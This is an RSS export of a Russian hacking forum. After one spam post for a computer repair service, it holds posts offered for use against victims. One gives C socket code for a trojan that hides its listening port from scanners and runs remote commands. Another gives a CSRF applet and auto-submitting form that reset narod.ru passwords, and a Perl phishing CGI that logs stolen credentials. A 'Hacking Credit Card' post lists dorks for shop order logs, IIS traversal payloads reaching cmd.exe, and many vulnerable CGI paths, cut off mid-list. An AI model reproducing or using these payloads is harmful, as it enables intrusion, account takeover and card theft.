https://kasper.7li.ru/ Kasper Xxxxxxxxx ru-ru Fri, 17 Mar 2023 14:30:39 +0300 MyBB/mybb.ru https://kasper.7li.ru/viewtopic.php?pid=30#p30 <p>Компьютеры, ноутбуки - техника современная и не застрахована от поломок. К такому типу техники нужен своевременный и комплексный подход, который могут обеспечить наши компетентные мастера. Самостоятельно починить компьютер сможет 5 человек из 100, а поломки происходят у каждого второго! Мы предоставляем услуги высокого качества по ремонту и исправлению проблем компьютерной техники более чем в 60 городах по РФ. Так же наши филиалы представлены в Республике Беларусь. Заявки обрабатываются нашими сотрудниками и не перепродаются в сторонние компании. Перейти:&#160; <a href="https://rempc-v-mo.ru/?t=33705" rel="nofollow" target="_blank">https://rempc-v-mo.ru/?t=33705</a></p> mybb@mybb.ru (zqrlnbkvoa) Fri, 17 Mar 2023 14:30:39 +0300 https://kasper.7li.ru/viewtopic.php?pid=30#p30 https://kasper.7li.ru/viewtopic.php?pid=29#p29 <p>Что главное для троянов и прочих программ &quot;удаленного управления&quot; компом? Конечно незаметность! И даже если получиться сокрыть саму программу, в частности дав ей &quot;невидимость&quot; в диспетчере задач, то это целиком не решит всей проблемы. Остается еще один способ обнаружения таких программ - через их функции работы с сетью. Иногда сканер выдает: &quot;открыто: 12345 порт - удаленное администрирование или trojan&quot;. Вот так и ловятся трояны </p> <p>Поэтому я тебе поведаю о способах сокрытия сетевых соединений, в чисто ознакомительных целях, конечно&#160; Для начала рассмотрим, как можно обнаружить присутствие твоей проги на чужом компе. Как ты знаешь, трояны состоят из серверной и клиентской частей, причем серверная находиться на чужом компе. Отсюда и открытый порт трояна, который и обнаруживается сканером портов. Конечно, в ТСP соединении без этого не обойтись, сервер всегда должен иметь открытый порт, коннектясь к которому, сканер определяет, открыт порт или нет. От этого конечно не избавиться, но риск обнаружения можно намного уменьшить, даже свести его почти к нулю </p> <p>Как можно уменьшить вероятность обнаружения, в обычном случае почти стопроцентную? Элементарно - не держать порт все время открытым, а открывать его только на короткий период через определенный промежуток времени. Конечно, это потребует усложнения клиентской части, да и может добавить трудностей при работе с сервером, но всегда можно подобрать соотношение между паранойей обнаружения трояна и удобством работы с прогой.</p> <p>Для начала инициализируем библиотеку для работы с сокетами:</p> <p>WSADATA WsaData; <br />int err = WSAStartup (0x0101, &amp;WsaData);<br />if (err == SOCKET_ERROR) {<br />printf (&quot;WSAStartup() failed: %ld\n&quot;, GetLastError ());</p> <p>return 1; <br />}</p> <p>Затем создадим структура адреса для сокета:</p> <p>SOCKADDR_IN tr1; <br />tr1.sin_family = AF_INET; <br />tr1.sin_port = htons(1234);//port<br />tr1.sin_addr.S_un.S_addr = inet_addr(&quot;127.0.0.1&quot;);//IP</p> <p>Затем создадим сокет и &quot;привяжем&quot; его к структуре:</p> <p>s = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);</p> <p>bind( s, (LPSOCKADDR)&amp;sin1, sizeof(sin1));</p> <p>Все эти операции более подробно рассматривались в других статьях (например &quot;TCP Logger своими руками&quot;), поэтому не буду заострять внимания на их подробном описании.</p> <p>Далее начинается собственно основная часть программы:</p> <p>int evn=1;<br />//evn - условие выхода, прерывания основного цикла. <br />while (evn&gt;0) <br />{</p> <p>AfxBeginThread(*MyFunction1,NULL);<br />Sleep(1000);<br />//запускаем один поток. Ждем 1000 мсек.</p> <p>AfxBeginThread(*MyFunction2,NULL);<br />Sleep(5000);<br />//Запускаем второй поток. ждем 5000 мсек.</p> <p>}</p> <p>Теперь опишем функции потоков и их переменные. Переменную сокета s нужно сделать глобальной, так же как и структура адресов:</p> <p>SOCKADDR_IN tr1; <br />SOCKADDR_IN tr2; </p> <p>Эта функция как раз и выполняет функцию сервера - открывает порт и обрабатывает подключения.</p> <p>UINT MyFunction1( LPVOID pParam )<br />{ </p> <p>int sz=sizeof(tr2);<br />int os;<br />os=listen(s,1);<br />if (os!=-1)<br />{<br />s2=accept(s,(struct sockaddr*)&amp;tr2,&amp;sz);<br />//////здесь могут быть дополнительные функции.</p> <p>}</p> <p>return 0;<br />}</p> <p>Вторая функция &quot;вырубает&quot; сокет, поэтому вызов listen выдает ошибку, и порт закрывается. </p> <p>UINT MyFunction2( LPVOID pParam )<br />{ <br />shutdown(s,0);//вырубание сокета.<br />return 0;<br />}</p> <p>Таким образом получаем работу проги по следующему алгоритму:</p> <p>- Открываем порт.<br />- Ждем 1000 миллисекунд//это время порт открыт<br />- Закрываем порт.<br />- Ждем 5000 миллисекунд//это время - закрыт.</p> <p>Так что порт будет открыт и может быть засечен сканером только 1/6 всего времени работы проги, т.е. вероятность обнаружения чуть более 16%. Параметры в 1 и 5 секунд можно изменять в широких пределах, только нужно не забывать о скорости передачи данных в сети. Где-нибудь в локалке и 100 миллисекунд более чем достаточно, а на тормозном dial-up'e и секунды мало будет. Теперь нам нужно определиться, что нам нужно от трояна. Если он нужен только для передачи команд на чужой комп, то их вполне возможно передать в тот промежуток времени, когда порт открыт.&#160; Для этого в месте дальнейшего кода пишем:</p> <p>recv(s2,buf,sizeof(buf),0);<br />if (buf==&quot;Noconnect\0&quot;) //Noconnect - ключевое слово<br />//указывает, что коннект через 1000 мсек будет прерван<br />{<br />brk=1;<br />}</p> <p>Теперь все оставшееся время принимаем пакеты:</p> <p>int stopp=1;<br />//stopp - переменная, указывающая, что передача пакетов прекращена<br />while (stopp&gt;0)<br />{<br />recv(s2,buf,sizeof(buf),0);<br />if (buf==&quot;Endpackets\0&quot;)<br />//указывает, что передача пакетов окончена.<br />{<br />stopp=0;<br />}<br />//далее может быть интерпретатор команд, который выполняет переданные по сети //команды<br />//наиболее простой путь - воспользоваться командой WinExec</p> <p>}</p> <p>Также следует отметить, что вместо команды &quot;Endpackets&quot; можно передать команду &quot;Noconnect&quot;, да и вообще без команды Endpackets можно обойтись, потому как связь оборвется через определенное время, но лучше все делать культурно&#160; Только одно &quot;но&quot; - если команда &quot;Noconnect&quot; опоздает и придет после секундного интервала открытия порта, то он будет открыт весь цикл ожидания. Так что выбирай, что тебе нужнее - либо стопроцентно передать команды даже на плохой связи, либо незаметность функционирования проги. </p> <p>Можно добавить еще одну полезную функцию - проверку скорости связи и установку периодов различного состояния порта. Время ты сам можешь подобрать в зависимости от состояния связи. Поэтому добавим следующие функции в &quot;интерпретатор команд&quot;:</p> <p>if (buf==&quot;Test\0&quot;)<br />//команда проверки связи<br />{<br />char buf1[7]=&quot;TestOk\0&quot;;<br />send(s2,buf1,7,0);</p> <p>}</p> <p>Алгоритм - если получена команда &quot;Тest&quot; - тут же послать ответ. Клиентская часть будет подсчитает время между посылкой пакета с командой &quot;Тest&quot; и приемом пакета с командой &quot;ТestOk&quot;. В среднем время прохождения будет равно половине полученного значения. После этого можно думать о изменении периодов состояния портов</p> <p>if (buf==&quot;TimeWork\0&quot;)<br />//команда изменения длительности открытия порта<br />{<br />char buf1[10];<br />recv(s2,buf1,10,0);<br />//в этом пакете передается длительность периода открытия порта в миллисекундах<br />//здесь должна быть функция перевода значения типа &quot;массив char&quot; в &quot;integer&quot;<br />// а затем установка значения переменных длительности периодов.<br />}</p> <p>if (buf==&quot;TimeWait\0&quot;)<br />//команда изменения времени ожидания открытия порта<br />{<br />char buf1[10];<br />recv(s2,buf1,10,0);<br />//в этом пакете передается длительность периода ожидания в миллисекундах</p> <p>}</p> <p>Дело за малым - перевести полученные значения в тип integer и присвоить это значение нужной переменной.&#160; </p> <p>После этого серверную часть можно считать почти что супер-пупер-крутой&#160; Осталось сделать такой же клиентскую часть&#160; Алгоритм похож до безобразия, думаю, ты сам справишься с претворением его в код&#160; Мы также коннектимся каждые N милисекунд, где N - время, которое порт открыт. По умолчанию - 1 секунда. Если подключение за это время не увенчалось успехом - значит порт сервера в этот момент времени закрыт, поэтому прерываем коннект и пытаеся подключиться еще раз. Так после нескольких неудачных попыток, повторенных в цикле, мы в конце концов подключимся к серверной части. </p> <p>Этот способ, несмотря на очевидные плюсы, имеет и некоторые минусы. Например, юзер может посмотреть открытые порты на локальной машине с помощью проги netstat с ключом -an. Тогда прога выдаст что-то вроде:</p> <p>TCP 0.0.0.0:500 0.0.0.0 LISTENING <br />TCP 0.0.0.0:10000 0.0.0.0 LISTENING <br />TCP x.x.x.x:12345 0.0.0.0 LISTENING</p> <p>Так что все открытые порты видны как на ладони. Так что даже закрытый порт будет виден, но за одним исключением - если программа, которая открыла этот порт, будет завершена. Вот этим мы и воспользуемся. Правда, придется усложнить серверную часть трояна, сделав ее в виде 2 программ - вспомогательная будет периодически запускать основную, которая и будет выполнять все необходимые функции. </p> <p>Алгоритм простой - первая прога в цикле запускает вторую, ждет M миллисекунд, опять запускает вторую и т.д. Вторая прога - в течении N миллисекунд выполняет нужные действия, завершается. Если троян должен работать непрерывно, можно сделать так, чтобы вторая прога не завершалась через N, а дабы не было N'ого количества подключенных серваков, то проверяла бы вначале, есть ли соединение. И если есть, то завершала бы свою работу.</p> <p>Для запуска второй проги можно воспользоваться функцией WinExec из библитеки Winbase.h Она позволяет запускать программы в различных режимах, в том числе и в фоновом. Этим мы и воспользуемся, запустив функцию с параметрами WinExec(&quot;C:\...\tr.exe&quot;,0); Первый параметр - путь к файлу. Правда, в таком случае прога будет видна в диспетчере задач (хотя это можно исправить, но данный вопрос выходит за рамки статьи), но вероятность ее обнаружения опять-таки будет мала, все зависит от соотношения длительности периодов ожидания/работы. В этот период троян можно засечь netstat'ом, но опять-таки только во время работы проги, а не все время, как в первом случае.</p> <p>Эти способы далеко не единственные, которыми можно решить эту интересную проблему, но другие я рассмотрю в следующей статье.</p> <p> <span style="color: red">Взято с другого сайта!</span></p> mybb@mybb.ru (Kasper) Thu, 07 Jan 2010 18:31:08 +0300 https://kasper.7li.ru/viewtopic.php?pid=29#p29 https://kasper.7li.ru/viewtopic.php?pid=28#p28 <p>Как обычно берем наш любимый narod.ru , и ломаем его сайты. К примеру возьмем сайт wwwulashir.narod.ru<br />и дефейсим его, как? да легко! Ты же знаешь что пасс на сайт , такой же как и к мылу. так вот пишим<br />и вставляем его в письмо, (незабудь про соответствующий текст) и мыло лучше сделать support@narod.ru<br />или administrator@narod.ru, ну короче ты понял! Вот те листинг его надо вставить в письмо.<br />&lt;applet code=readr.class name=readrie codebase=&quot;_ПУТЬ_/&quot; width=320 height=240 &gt;<br />SET Java On<br />&lt;/applet&gt;<br />import java.applet.*;<br />import java.awt.*;<br />mport java.net.*;<br />public class readrie extends Applet<br />{<br />public void paint(Graphics g)<br />{<br />try<br />{<br />URL myURL=new URL(&quot;_ПУТЬ_editprofil.html&quot;);<br />getAppletContext().showDocument(myURL,&quot;_self&quot;);<br />}<br />catch (Exception e)<br />{<br />g.drawString(&quot;Error&quot;, 10, 10);<br />}<br />}<br />} </p> <p>editprofil.html ( не забудьте отредактировать ИМЯ_ПОЛЬЗОВАТЕЛЯ и НОВЫЙ_ПАРОЛЬ)</p> <p>&lt;html&gt;<br />&lt;body&gt;<br />&lt;form method=post action=&quot;http://koi.narod.ru/cgi-bin/modifyuser?modify&quot;&gt;<br />&lt;input type=&quot;hidden&quot; name=&quot;Username&quot; value=&quot;ИМЯ_ПОЛЬЗОВАТЕЛЯ &quot;&gt;<br />&lt;input type=&quot;text&quot; name=&quot;RealName&quot; value=&quot;A. V. Komlni&quot;&gt;<br />&lt;input type=&quot;text&quot; name=&quot;Forward&quot; value=&quot;&quot;&gt;<br />&lt;input type=&quot;password&quot; name=&quot;Password&quot; value=&quot; НОВЫЙ_ПАРОЛЬ &quot;&gt;<br />&lt;input type=&quot;password&quot; name=&quot;Password_Verify&quot; value=&quot;НОВЫЙ_ПАРОЛЬ &quot;&gt;<br />&lt;input type=checkbox name=&quot;Flags.DoNotKeepMail&quot; &gt; Не сохранять почту при пересылке</p> <p>&lt;input type=&quot;submit&quot; value=&quot;Сохранить&quot;&gt;<br />&lt;input type=&quot;reset&quot; value=&quot;Восстановить&quot;&gt;<br />&lt;/form&gt;<br />&lt;SCRIPT LANGUAGE=&quot;JavaScript&quot;&gt;<br />document.forms[0].submit();<br />&lt;/script&gt;<br />&lt;/body&gt;<br />&lt;/html&gt;</p> <p>Все скрипт готов, кстати на народе поста глюканая, так что если файл будет вложением, то Messenger откр<br />оет его автоматически. Еу а посли ты сам знаешь как попасть на сайт!!!<br />Удачи те друг!!!</p> <p>2</p> <p>Вот сидел я и решил всё таки написать чё-нить&#160; По большому настоянию Eraser. Основа статьи это социальная инженерия, о которой уже было написано не мало. Не буду повторяться. Этот трюк можно провести со всеми новичками в сети Интернет. А рассматривать мы его будем уже на «банальном» хостинге narod.ru.(Повторюсь: его можно проделать на любом бесплатном хостинге, да даже и на платном моно попробовать&#160; Начнём для проведения нижеописанных действий вам понадобятся:<br />1. Мозги<br />2. Руки<br />3. Хостинг с поддержкой CGI<br />4. Небольшое знание HTML<br />И так ищем жертву… У нас она будет xxx.narod.ru. Вообще для этого случая нужно искать не заброшенный сайт. И чтобы в контактах было мыло типа xxx@narod.ru Теперь нагло сдираем face народа&#160; Подправляем его, как надо, вставляем туда форму:</p> <p>Ещё надо написать write.cgi:<br />&amp;GetFormInput;</p> <p>$name=$field{'name'};<br />$pass=$field{'pass'};</p> <p>sub GetFormInput {</p> <p>(*fval) = @_ if @_ ;<br />local ($buf);<br />if ($ENV{'REQUEST_METHOD'} eq 'POST') {<br />read(STDIN,$buf,$ENV{'CONTENT_LENGTH'});<br />}<br />else {<br />$buf=$ENV{'QUERY_STRING'};<br />}<br />if ($buf eq &quot;&quot;) {<br />return 0 ;<br />}<br />else {<br />@fval=split(/&amp;/,$buf);<br />foreach $i (0 .. $#fval){<br />($name,$val)=split (/=/,$fval[$i],2);<br />$val=~tr/+/ /;<br />$val=~ s/%(..)/pack(&quot;c&quot;,hex($1))/ge;<br />$name=~tr/+/ /;<br />$name=~ s/%(..)/pack(&quot;c&quot;,hex($1))/ge;</p> <p>if (!defined($field{$name})) {<br />$field{$name}=$val;<br />}<br />else {<br />$field{$name} .= &quot;,$val&quot;;<br />}<br />}<br />}<br />return 1;<br />}<br />open (OUTFILE, &quot;&gt;&gt;pass.txt&quot;);<br />print OUTFILE &quot;$name&quot;;<br />print OUTFILE &quot;\n$pass&quot;;<br />print OUTFILE &quot;\n=======END=======\n\n&quot;;<br />close (OUTFILE);<br />print &quot;Location: http://your_redirect_URL\n&quot; ;</p> <p>Последняя строчка это перенаправление. Лучше послать на главную страницу народа. Всё наш сайт мы подготовили. <br />Теперь пишем этому &quot;карапузу&quot; (прим. Eraser'a : телепузу =)) письмо с анонимного мыла от support@narod.yandex.ru вида: &quot;Здравствуйте ваш сайт пытались взломать и вам срочно не позже чем через 96 часов<br />надо пройти повторную авторизацию. Идите по ссылке(ага вот тута он и отдаст нам пароль) а ссылочка, то вы скажите видно будет, что не народовская... А я скажу вам нифига... А зачем нам nslookup? Вот так вот.&#160; короче ссылка будет вида: IP_ВАШЕГО_САЙТА/ sign.html . Усё готово.. теперь токо надо ждать .<br />Дополнение:<br />В доставание пароля вам поможет ваша фантазия при написание письма лопуху...</p> mybb@mybb.ru (Kasper) Thu, 07 Jan 2010 18:29:15 +0300 https://kasper.7li.ru/viewtopic.php?pid=28#p28 https://kasper.7li.ru/viewtopic.php?pid=27#p27 <p>Hacking Credit Card<br />trang n&#224;y &#273;&#227; &#273;&#432;&#7907;c &#273;&#7885;c l&#7847;n </p> <p>?search=action&amp;keywords=%20&amp;template=order.log<br /><a href="http://www.yahoo.com/" rel="nofollow" target="_blank">http://www.yahoo.com/</a><br />2. search for &quot;/cgi/shopper.cgi?&quot; or for more results try &quot;/cgi-bin/shopper.cgi?&quot; (&quot;shopcart.cgi&quot; can also be used)<br />3. find a site (&quot;your shopping cart&quot; or &quot;Subtotal $0.00&quot;) and remove everything after shopper.cgi <br />(the url should contain <br />&quot;/cgi/shopper.cgi?display=action&quot; or <br />&quot;/cgi-bin/shopper.cgi?display=action&quot; or <br />possibly &quot;checkout=action&quot;)<br />4. add &quot;?search=action&amp;keywords=%20&amp;template=order.log&quot; to the url and press enter</p> <p>/cgi-bin/shopper.cgi?search=action&amp;keywords=apollos%2520&amp;template=order.log<br />/cgi-bin/shopper.cgi?search=action&amp;keywords=cgi_bin%20&amp;template=order.log<br />/cgi-bin/shopper.cgi?search=action&amp;keywords=cgi_bin%2520&amp;template=shopper.conf<br />/cgi-bin/shopper.cgi?search=action&amp;keywords=powerd0wn%20&amp;template=shopper.conf<br />/cgi-bin/pdg_cart/shopper.conf <br />/cgi-bin/products/loadpage.cgi?user_id=id&amp;file=/orders.txt</p> <p>-------------------IRCSHELL UNICODE FOR HACKING----------------</p> <p>/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\<br />/_vti_bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\<br />/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\<br />/scripts/%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\<br />/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\<br />/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\<br />/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\<br />/_vti_bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\<br />/msadc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\<br />/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\<br />/scripts/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\<br />/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\<br />/cgi-bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\<br />/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\<br />/pbserver/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\<br />/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\<br />/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/winnt/system32/cmd.exe?/c+dir+c:\<br />/msadc/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\<br />/pbserver/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\<br />/iisadmpwd/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\<br />/_vti_bin/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c/winnt/system32/cmd.exe?/c+dir+c:\<br />/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\<br />/scripts/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\<br />/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\<br />/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\<br />/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\<br />/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\<br />/test.php3<br />/cgi-bin/test.php3<br />/cgi-bin/cgiemail/uargg.txt<br />/cgi-bin/web2mail.cgi<br />/random_banner/index.cgi?image_list=alternative_image.list&amp;html_file=../../../../../etc/hosts<br />/random_banner/index.cgi?image_list=alternative_image.list&amp;html_file=|ls%20-la|<br />/example.jsp../<br />/example%2ejsp<br />/example.jsp..<br />/index.jsp..<br />/test.jsp..<br />/example.jsp%81<br />/index.JSP<br />/index.jsp../<br />/test.jsp../<br />/index%2ejsp<br />/test%2ejsp<br />/index.JHTML<br />/*.jhtml/<br />/*.jsp/<br />/ConsoleHelp/<br />/*.shtml/<br />/cgi-bin/mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html=<br />/cgi-bin/maillist.cgi?cmd=list&amp;fldrname=inbox&amp;fldnum=1&amp;order=2&amp;searchkey=&amp;search_fldnum=0&amp;page=99999&amp;html=<br />/cgi-bin/userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0als<br />/..\..\..\winnt\repair\sam._<br />:80/../../../autoexec.bat<br />/......autoexec.bat<br />/.html/............/autoexec.bat<br />/../../../../../../../boot.ini<br />/....../<br />/..../<br />/inc/<br />/include/<br />/iisadmpwd/<br />/iissamples/<br />/scripts/iisadmin/ism.dll%3fhttp/dir<br />/iisadmin/ism.dll%3fhttp/dir<br />/cgi-bin/htimage.exe<br />/_vti_bin/fpcount.exe<br />/global.asa<br />/global.asa+.htr<br />/global.asa\<br />/default.asp+.htr<br />/main.asp+.htr<br />/_vti_bin/shtml.dll/tstt.htm<br />/_vti_inf.html<br />/_vti_log/author.log<br />/_vti_pvt<br />/_vti_bin/shtml.dll<br />/_vti_bin/shtml.exe<br />/_private/form_results.txt<br />/secret/index.html<br />/secret/index.htm<br />/cgi-bin/phf<br />/cgi-bin/commander.pl<br />/cgi-bin/Count.cgi<br />/cgi-bin/test.pl<br />/cgi-bin/printenv<br />/cgi-bin/test.cgi<br />/cgi-bin/test-cgi<br />/cgi-bin/nph-test-cgi<br />/cgi-bin/php.cgi<br />/cgi-bin/handler<br />/cgi-bin/webgais<br />/cgi-bin/websendmail<br />/cgi-bin/webdist.cgi<br />/cgi-bin/faxsurvey<br />/cgi-bin/htmlscript<br />/cgi-bin/pfdisplay<br />/cgi-bin/perl.exe<br />/cgi-bin/perl<br />/perl<br />/scripts/perl.exe<br />/wwwboard/wwwboard.pl<br />/cgi-bin/wwwboard.pl<br />/wwwboard/wwwadmin.pl<br />/cgi-bin/wwwadmin.pl<br />/wwwboard/wwwadmin.cgi<br />/cgi-bin/wwwadmin.cgi<br />/cgi-bin/jj<br />/cgi-bin/fi<br />/cgi-bin/finger<br />/cgi-bin/finger.cgi?action=archives&amp;cmd=specific&amp;&amp;filename=99.10.28.15.23.username.|/bin/ls|<br />/cgi-bin/wais.pl<br />/cgi-bin/edit.pl<br />/cgi-bin/textcounter.pl<br />/cgi-bin/info2www<br />/cgi-bin/cachemgr.cgi<br />/cgi-bin/wguest.exe<br />/scripts/wguest.exe<br />/cgi-bin/test.exe<br />/scripts/test.exe<br />/cgi-bin/test.bat<br />/scripts/test.bat<br />/cgi-bin/www-sql<br />/cgi-bin/search.cgi%3fletter=<br />/cgi-bin/campas<br />/cgi-bin/view-source<br />/cgi-bin/webgais<br />/cgi-bin/aglimpse<br />/cgi-bin/wrap<br />/cgi-bin/cgiwrap<br />/cgi-bin/AnyForm2<br />/cgi-bin/infogate<br />/search97/s97_cgi.exe<br />/search97/search97.vts<br />/cgi-bin/dumpenv.pl<br />/session/adminlogin?RCpage=/sysadmin/index.stm<br />/cgi-bin<br />/cgi-shl<br />/scripts<br />/scripts/bdir.htr<br />/scripts/convert.bas<br />/scripts/files.pl<br />/cgi-bin/files.pl<br />/domcfg.nsf/%3fopen<br />/domcfg.nsf/URLRedirect/%3fOpenForm<br />/domcfg.nsf/viewname%3fSearchView&amp;Query=&quot;*&quot;<br />/log.nsf<br />/domlog.nsf<br />/names.nsf<br />/catalog.nsf<br />/database.nsf?EditDocument<br />/names.nsf/Open<br />/cgi-bin/unlg1.1<br />/cgi-bin/man.sh<br />/cgi-bin/AT-admin.cgi<br />/cgi-bin/filemail.pl<br />/cgi-bin/mailform.pl<br />/cgi-bin/mailto.cgi<br />/cgi-bin/mailform.cgi<br />/cgi-bin/maillist.pl<br />/cgi-bin/formto.pl<br />/cgi-bin/bnbform.cgi<br />/cgi-bin/bnbform.pl<br />/cgi-bin/bnbform<br />/cgi-bin/survey.cgi<br />/htbin/postform?h_mailto=swoopme%40hotmail.com&amp;h_reply-file=../../../../../../../etc/hosts<br />/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&amp;h_reply-file=../../../../../../../etc/hosts<br />/cgi-bin/postform?h_mailto=swoopme%40hotmail.com&amp;h_reply-file=|ls|<br />/cgi-bin/textcounter.pl<br />/cgi-bin/classifieds.cgi<br />/cgi-bin/environ.cgi<br />/cgi-bin/environ.pl<br />/cgi-dos/args.bat<br />/cgi-bin/carbo.dll<br />/cgi-bin/fpexplore.exe<br />/cfdocs/expeval/exprcalc.cfm<br />/cfdocs/expeval/sendmail.cfm<br />/cfdocs/expeval/eval.cfm<br />/cfdocs/expeval/openfile.cfm<br />/cfdocs/expeval/displayopenedfile.cfm<br />/cfdocs/exampleapp/email/getfile.cfm<br />/cfdocs/examples/CVLibrary/GetFile.CFM?FT=Text&amp;FST=Plain&amp;FilePath=C:\boot.ini<br />/cfdocs/exampleapp/publish/admin/addcontent.cfm<br />/cfdocs/exampleapp/docs/sourcewindow.cfm?Template=<br />/cfdocs/snippets/evaluate.cfm<br />/cfdocs/snippets/fileexists.cfm<br />/cfdocs/snippets/viewexample.cfm?Tagname=<br />/cfdocs/cfmlsyntaxcheck.cfm<br />/cfdocs/snippets/setlocale.cfm<br />/cgi-bin/whois_raw.cgi<br />/cgi-bin/query%3f<br />:9000/cgi-bin/query%3f<br />/cgi-bin/admin.cgi<br />/cgi-bin/ppdscgi.exe<br />/ppwb/Temp/<br />/_private/form_results.txt<br />/_private/register.htm<br />/_private/register.txt<br />/_private/registrations.htm<br />/_private/registrations.txt<br />/_vti_bin/<br />/_vti_bin/_vti_adm<br />/_vti_bin/_vti_adm/admin.dll <br />/_vti_bin/_vti_aut<br />/_vti_bin/_vti_aut/author.dll<br />/_vti_bin/_vti_aut/author.exe<br />/_vti_bin/_vti_aut/dvwssr.dll<br />/_vti_bin/shtml.dll<br />/_vti_bin/shtml.exe<br />/_vti_inf.html<br />/_vti_pvt/access.cnf<br />/_vti_pvt/admin.pwd<br />/_vti_pvt/administrators.pwd<br />/_vti_pvt/authors.pwd<br />/_vti_pvt/service.cnf<br />/_vti_pvt/service.pwd<br />/_vti_pvt/service.stp<br />/_vti_pvt/services.cnf<br />/_vti_pvt/shtml.dll<br />/_vti_pvt/shtml.exe<br />/_vti_pvt/svcacl.cnf<br />/_vti_pvt/users.pwd<br />/_vti_pvt/writeto.cnf<br />/_vti_pwd/administrators.pwd<br />/~root<br />/admcgi/contents.htm<br />/admin.php3<br />/adminlogin?RCpage=/sysadmin/index.stm<br />/admisapi/fpadmin.htm<br />/adsamples/config/site.csc<br />/AdvWorks/equipment/catalog_type.asp<br />/Album/<br />/ASPSamp/AdvWorks/equipment/catalog_type.asp<br />/aux<br />/bb-dnbd/bb-hist.sh<br />/carbo.dll<br />/catalog.nsf<br />/cfappman/index.cfm<br />/cfdocs/cfmlsyntaxcheck.cfm<br />/cfdocs/exampleapp/docs/sourcewindow.cfm<br />/cfdocs/exampleapp/email/getfile.cfm?filename=c:\boot.ini<br />/cfdocs/exampleapp/publish/admin/addcontent.cfm<br />/cfdocs/exampleapp/publish/admin/application.cfm1/cfdocs/exampleapp/email/application.cfm<br />/cfdocs/examples/cvbeans/beaninfo.cfm<br />/cfdocs/examples/mainframeset.cfm<br />/cfdocs/examples/parks/detail.cfm<br />/cfdocs/expelval/displayopenedfile.cfm<br />/cfdocs/expelval/exprcalc.cfm<br />/cfdocs/expelval/openfile.cfm<br />/cfdocs/expelval/sendmail.cfm<br />/cfdocs/expeval/eval.cfm<br />/cfdocs/expressions.cfm<br />/cfdocs/root.cfm<br />/cfdocs/snippets/evaluate.cfm<br />/cfdocs/snippets/fileexist.cfm<br />/cfdocs/snippets/fileexists.cfm<br />/cfdocs/snippets/gettempdirectory.cfm<br />/cfdocs/snippets/viewexample.cfm<br />/cfdocs/zero.cfm<br />/CFIDE/Administrator/startstop.html<br />/cfusion/cfapps/forums/data/forums.mdb<br />/cfusion/cfapps/forums/forums_.mdb<br />/cfusion/cfapps/security/data/realm.mdb<br />/cfusion/cfapps/security/realm_.mdb<br />/cfusion/database/cfexamples.mdb<br />/cfusion/database/cfsnippets.mdb<br />/cfusion/database/cypress.mdb<br />/cfusion/database/smpolicy.mdb<br />/cgi-bin/<br />/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi<br />/cgi-bin/.fhp<br />/cgi-bin/add_ftp.cgi<br />/cgi-bin/aglimpse<br />/cgi-bin/alibaba.pl<br />/cgi-bin/AnForm2<br />/cgi-bin/AnyBoard.cgi<br />/cgi-bin/AnyForm2<br />/cgi-bin/apexec.pl<br />/cgi-bin/archie<br />/cgi-bin/architext_query.cgi<br />/cgi-bin/AT-admin.cgi<br />/cgi-bin/AT-generate.cgi<br />/cgi-bin/ax.cgi<br />/cgi-bin/ax-admin.cgi<br />/cgi-bin/axs.cgi<br />/cgi-bin/bb-hist.sh<br />/cgi-bin/bigconf.cgi<br />/cgi-bin/bizdb1-search.cgi<br />/cgi-bin/bnbform.cgi<br />/cgi-bin/c_download.cgi<br />/cgi-bin/cachemgr.cgi<br />/cgi-bin/calendar<br />/cgi-bin/campas<br />/cgi-bin/cart.pl<br 